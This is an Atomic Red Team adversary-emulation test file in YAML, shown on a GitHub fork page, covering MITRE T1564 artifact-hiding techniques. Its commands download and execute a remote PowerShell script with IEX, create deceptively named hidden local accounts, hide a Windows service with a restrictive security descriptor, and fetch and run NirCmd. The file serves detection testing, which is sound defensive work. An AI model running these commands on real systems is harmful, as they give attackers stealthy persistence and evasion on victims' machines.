forked from redcanaryco/atomic-red-team
-
Notifications
You must be signed in to change notification settings - Fork 0
/
T1564.yaml
126 lines (121 loc) · 5.89 KB
/
T1564.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
attack_technique: T1564
display_name: "Hide Artifacts"
atomic_tests:
- name: Extract binary files via VBA
auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a
description: |
This module extracts a binary (calc.exe) from inside of another binary.
In the wild maldoc authors will use this technique to hide binaries inside of files stored
within the office document itself. An example of this technique can be seen in sample
f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226
This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2
is the same document without all the malicious code. Document 1 will copy Document 2 to the file system
and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this
oleObject.bin file is a payload that is parsed out and executed on the file system.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
Microsoft Word must be installed
prereq_command: |
try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
executor:
command: |
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
$macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
cleanup_command: |
Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
name: powershell
- name: Create a Hidden User Called "$"
auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
description: Creating a user with a username containing "$"
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: net user $ ATOMIC123! /add /active:yes
cleanup_command: net user $ /DELETE 2>&1
- name: Create an "Administrator " user (with a space on the end)
auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c
description: Creating a user with a username containing with a space on the end
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: New-LocalUser -Name "Administrator " -NoPassword
cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null
- name: Create and Hide a Service with sc.exe
auto_generated_guid: 333c7de0-6fbe-42aa-ac2b-c7e40b18246a
description: |
The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query.
Upon successful execution, sc.exe creates a new service changes the security descriptor.
https://twitter.com/Alh4zr3d/status/1580925761996828672
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
supported_platforms:
- windows
input_arguments:
service_name:
description: Name of service to create
type: string
default: AtomicService
executable_command:
description: Command to execute as a service
type: string
default: 'C:\Windows\System32\calc.exe'
executor:
command: |
sc.exe create #{service_name} binPath= "#{executable_command}"
sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
cleanup_command: |
sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
sc.exe delete #{service_name}
name: command_prompt
elevation_required: true
- name: Command Execution with NirCmd
description: |
NirCmd is used by threat actors to execute commands, which can include recon and privilege escalation via running commands via the SYSTEM account
See https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis
supported_platforms:
- windows
input_arguments:
nircmd_location:
description: Location of nircmd executable
type: Path
default: PathToAtomicsFolder\..\ExternalPayloads\nircmd.exe
command_to_execute:
description: Command for nircmd to execute
type: Path
default: win child class "Shell_TrayWnd" hide class "TrayClockWClass"
cleanup_command_to_execute:
description: Cleanup command to undo the arbitrary command ran by nircmd
type: Path
default: win child class "Shell_TrayWnd" show class "TrayClockWClass"
dependency_executor_name: powershell
dependencies:
- description: |
The Nircmd executable must exist at (#{nircmd_location})
prereq_command: |
if (Test-Path #{nircmd_location}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://www.nirsoft.net/utils/nircmd-x64.zip" -outfile "PathToAtomicsFolder\..\ExternalPayloads\nircmd.zip"
expand-archive -path "PathToAtomicsFolder\..\ExternalPayloads\nircmd.zip" -destinationpath PathToAtomicsFolder\..\ExternalPayloads\
executor:
command: |
cmd /c #{nircmd_location} #{command_to_execute}
cleanup_command: |
cmd /c #{nircmd_location} #{cleanup_command_to_execute} -erroraction silentlycontinue | out-null
name: powershell
elevation_required: false